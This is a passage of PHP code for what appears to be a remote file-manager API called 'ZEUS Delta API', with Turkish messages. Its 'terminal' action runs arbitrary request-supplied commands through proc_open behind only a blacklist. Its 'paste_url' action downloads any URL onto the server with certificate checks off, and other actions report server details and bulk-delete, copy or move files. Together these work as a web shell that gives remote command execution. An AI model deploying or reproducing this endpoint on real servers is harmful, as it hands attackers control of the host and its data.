==================== TERMINAL ==================== case 'terminal': if ($api_readonly) api_error('Salt okunur mod', 403); if (!$api_terminal_enabled) { api_error('Terminal API devre disi', 403); } $command = isset($input['command']) ? $input['command'] : ''; $cwd = isset($input['cwd']) ? $input['cwd'] : ''; $timeout = isset($input['timeout']) ? 
min((int)$input['timeout'], 300) : 30; // max 5 dakika if (empty($command)) { api_error('command parametresi gerekli'); } // Kara liste kontrolu foreach ($api_terminal_blacklist as $blocked) { if (stripos($command, $blocked) !== false) { api_error('Bu komut yasaklanmis: ' . $blocked, 403); } } // Calisma dizini $exec_dir = $root_path; if (!empty($cwd)) { $exec_dir = api_clean_path($cwd, $root_path); if (!is_dir($exec_dir)) { $exec_dir = $root_path; } } $old_cwd = getcwd(); chdir($exec_dir); $start_time = microtime(true); // proc_open ile calistir (stdin, stdout, stderr) $descriptors = array( 0 => array('pipe', 'r'), // stdin 1 => array('pipe', 'w'), // stdout 2 => array('pipe', 'w'), // stderr ); $env = null; $process = proc_open($command, $descriptors, $pipes, $exec_dir, $env); if (!is_resource($process)) { chdir($old_cwd); api_error('Komut calistirilamadi'); } // stdin kapat fclose($pipes[0]); // Non-blocking mode stream_set_blocking($pipes[1], false); stream_set_blocking($pipes[2], false); $stdout = ''; $stderr = ''; $timed_out = false; while (true) { $status = proc_get_status($process); $stdout .= stream_get_contents($pipes[1]); $stderr .= stream_get_contents($pipes[2]); if (!$status['running']) { break; } if ((microtime(true) - $start_time) > $timeout) { $timed_out = true; proc_terminate($process, 9); break; } usleep(50000); // 50ms } // Son okuma $stdout .= stream_get_contents($pipes[1]); $stderr .= stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); $exit_code = proc_close($process); $duration = round(microtime(true) - $start_time, 3); chdir($old_cwd); api_success(array( 'command' => $command, 'cwd' => $exec_dir, 'stdout' => $stdout, 'stderr' => $stderr, 'exit_code' => $exit_code, 'duration' => $duration . 's', 'timed_out' => $timed_out, ), $timed_out ? 'Komut zaman asimina ugradi' : 'Komut calistirildi'); break; // ==================== DISK INFO ==================== case 'disk_info': $path = isset($input['path']) ? 
$input['path'] : ''; $full_path = api_clean_path($path, $root_path); if (!is_dir($full_path)) { $full_path = $root_path; } $total = disk_total_space($full_path); $free = disk_free_space($full_path); $used = $total - $free; api_success(array( 'path' => $full_path, 'total' => $total, 'total_human' => api_format_bytes($total), 'used' => $used, 'used_human' => api_format_bytes($used), 'free' => $free, 'free_human' => api_format_bytes($free), 'used_percent' => round(($used / $total) * 100, 2), 'php_version' => PHP_VERSION, 'server_software' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : 'N/A', 'os' => PHP_OS, 'max_upload' => ini_get('upload_max_filesize'), 'max_post' => ini_get('post_max_size'), 'memory_limit' => ini_get('memory_limit'), ), 'Disk bilgisi'); break; // ==================== PASTE URL ==================== case 'paste_url': if ($api_readonly) api_error('Salt okunur mod', 403); $url = isset($input['url']) ? $input['url'] : ''; $dest = isset($input['destination']) ? $input['destination'] : ''; $filename = isset($input['filename']) ? $input['filename'] : ''; if (empty($url)) { api_error('url parametresi gerekli'); } // URL dogrulama if (!filter_var($url, FILTER_VALIDATE_URL)) { api_error('Gecersiz URL'); } // Dosya adi belirle if (empty($filename)) { $filename = basename(parse_url($url, PHP_URL_PATH)); if (empty($filename) || $filename === '/') { $filename = 'downloaded_' . time(); } } $dest_dir = api_clean_path($dest, $root_path); if (!is_dir($dest_dir)) { mkdir($dest_dir, 0755, true); } $target = $dest_dir . '/' . 
$filename; // cURL ile indir if (function_exists('curl_init')) { $ch = curl_init($url); $fp = fopen($target, 'w'); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_MAXREDIRS, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 120); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_USERAGENT, 'ZEUS Delta API/3.0'); $success = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $error = curl_error($ch); curl_close($ch); fclose($fp); if (!$success || $http_code >= 400) { @unlink($target); api_error('Indirme basarisiz: ' . ($error ?: 'HTTP ' . $http_code)); } } else { // file_get_contents fallback $content = @file_get_contents($url); if ($content === false) { api_error('URL indirilemedi'); } file_put_contents($target, $content); } api_success(array( 'url' => $url, 'filename' => $filename, 'path' => ($dest ? $dest . '/' : '') . $filename, 'size' => filesize($target), 'size_human' => api_format_bytes(filesize($target)), ), 'URL\'den indirildi'); break; // ==================== EDIT IMAGE ==================== case 'edit_image': if ($api_readonly) api_error('Salt okunur mod', 403); $path = isset($input['path']) ? $input['path'] : ''; $width = isset($input['width']) ? (int)$input['width'] : 0; $height = isset($input['height']) ? (int)$input['height'] : 0; $quality = isset($input['quality']) ? (int)$input['quality'] : 90; if (empty($path)) { api_error('path parametresi gerekli'); } if (!function_exists('imagecreatefromjpeg')) { api_error('GD extension yuklu degil'); } $full_path = api_clean_path($path, $root_path); if (!is_file($full_path)) { api_error('Dosya bulunamadi: ' . 
$path, 404); } $info = getimagesize($full_path); if (!$info) { api_error('Gecerli bir resim dosyasi degil'); } $orig_width = $info[0]; $orig_height = $info[1]; $mime = $info['mime']; // Boyut hesapla if ($width > 0 && $height == 0) { $height = (int)($orig_height * ($width / $orig_width)); } elseif ($height > 0 && $width == 0) { $width = (int)($orig_width * ($height / $orig_height)); } elseif ($width == 0 && $height == 0) { api_error('width veya height parametresi gerekli'); } // Kaynak resmi yukle switch ($mime) { case 'image/jpeg': $src = imagecreatefromjpeg($full_path); break; case 'image/png': $src = imagecreatefrompng($full_path); break; case 'image/gif': $src = imagecreatefromgif($full_path); break; case 'image/webp': $src = imagecreatefromwebp($full_path); break; default: api_error('Desteklenmeyen resim formati: ' . $mime); } $dst = imagecreatetruecolor($width, $height); // PNG/GIF transparanlik if ($mime === 'image/png' || $mime === 'image/gif') { imagecolortransparent($dst, imagecolorallocatealpha($dst, 0, 0, 0, 127)); imagealphablending($dst, false); imagesavealpha($dst, true); } imagecopyresampled($dst, $src, 0, 0, 0, 0, $width, $height, $orig_width, $orig_height); // Kaydet switch ($mime) { case 'image/jpeg': imagejpeg($dst, $full_path, $quality); break; case 'image/png': imagepng($dst, $full_path, min(9, (int)($quality / 10))); break; case 'image/gif': imagegif($dst, $full_path); break; case 'image/webp': imagewebp($dst, $full_path, $quality); break; } imagedestroy($src); imagedestroy($dst); api_success(array( 'path' => $path, 'original_size' => $orig_width . 'x' . $orig_height, 'new_size' => $width . 'x' . $height, 'file_size' => filesize($full_path), 'file_size_human' => api_format_bytes(filesize($full_path)), ), 'Resim boyutlandirildi'); break; // ==================== BULK DELETE ==================== case 'bulk_delete': if ($api_readonly) api_error('Salt okunur mod', 403); $paths = isset($input['paths']) ? 
$input['paths'] : array(); if (empty($paths) || !is_array($paths)) { api_error('paths parametresi gerekli (array)'); } $deleted = array(); $errors = array(); foreach ($paths as $path) { $full_path = api_clean_path($path, $root_path); if (file_exists($full_path)) { if (api_rdelete($full_path)) { $deleted[] = $path; } else { $errors[] = array('path' => $path, 'error' => 'Silinemedi'); } } else { $errors[] = array('path' => $path, 'error' => 'Bulunamadi'); } } api_success(array( 'deleted' => $deleted, 'errors' => $errors, 'total_deleted' => count($deleted), 'total_errors' => count($errors), ), count($deleted) . ' oge silindi'); break; // ==================== BULK COPY ==================== case 'bulk_copy': if ($api_readonly) api_error('Salt okunur mod', 403); $items = isset($input['items']) ? $input['items'] : array(); // items: [{"source": "path1", "destination": "path2"}, ...] // veya: paths + destination $paths = isset($input['paths']) ? $input['paths'] : array(); $destination = isset($input['destination']) ? $input['destination'] : ''; $copied = array(); $errors = array(); if (!empty($items)) { foreach ($items as $item) { $src = api_clean_path($item['source'], $root_path); $dst = api_clean_path($item['destination'], $root_path); if (!file_exists($src)) { $errors[] = array('source' => $item['source'], 'error' => 'Bulunamadi'); continue; } $dst_dir = dirname($dst); if (!is_dir($dst_dir)) mkdir($dst_dir, 0755, true); if (api_rcopy($src, $dst)) { $copied[] = $item['source']; } else { $errors[] = array('source' => $item['source'], 'error' => 'Kopyalanamadi'); } } } elseif (!empty($paths) && !empty($destination)) { $dest_dir = api_clean_path($destination, $root_path); if (!is_dir($dest_dir)) mkdir($dest_dir, 0755, true); foreach ($paths as $path) { $src = api_clean_path($path, $root_path); if (!file_exists($src)) { $errors[] = array('source' => $path, 'error' => 'Bulunamadi'); continue; } $dst = $dest_dir . '/' . 
basename($src); if (api_rcopy($src, $dst)) { $copied[] = $path; } else { $errors[] = array('source' => $path, 'error' => 'Kopyalanamadi'); } } } else { api_error('items veya (paths + destination) parametreleri gerekli'); } api_success(array( 'copied' => $copied, 'errors' => $errors, 'total_copied' => count($copied), 'total_errors' => count($errors), ), count($copied) . ' oge kopyalandi'); break; // ==================== BULK MOVE ==================== case 'bulk_move': if ($api_readonly) api_error('Salt okunur mod', 403); $paths = isset($input['paths']) ? $input['paths'] : array(); $destination = isset($input['destination']) ? $input['destination'] : ''; if (empty($paths) || empty($destination)) { api_error('paths ve destination parametreleri gerekli'); } $dest_dir = api_clean_path($destination, $root_path); if (!is_dir($dest_dir)) { mkdir($dest_dir, 0755, true); } $moved = array(); $errors = array(); foreach ($paths as $path) { $src = api_clean_path($path, $root_path); if (!file_exists($src)) { $errors[] = array('source' => $path, 'error' => 'Bulunamadi'); continue; } $dst = $dest_dir . '/' . basename($src); if (rename($src, $dst)) { $moved[] = $path; } else { $errors[] = array('source' => $path, 'error' => 'Tasinamadi'); } } api_success(array( 'moved' => $moved, 'destination' => $destination, 'errors' => $errors, 'total_moved' => count($moved), 'total_errors' => count($errors), ), count($moved) . ' oge tasindi'); break; // ==================== UNKNOWN ACTION ==================== default: api_error('Bilinmeyen action: ' . $action . '. Gecerli actionlar: list, read, write, delete, rename, copy, move, mkdir, upload, download, info, search, chmod, compress, extract, terminal, disk_info, paste_url, edit_image, bulk_delete, bulk_copy, bulk_move', 400); break; } ?>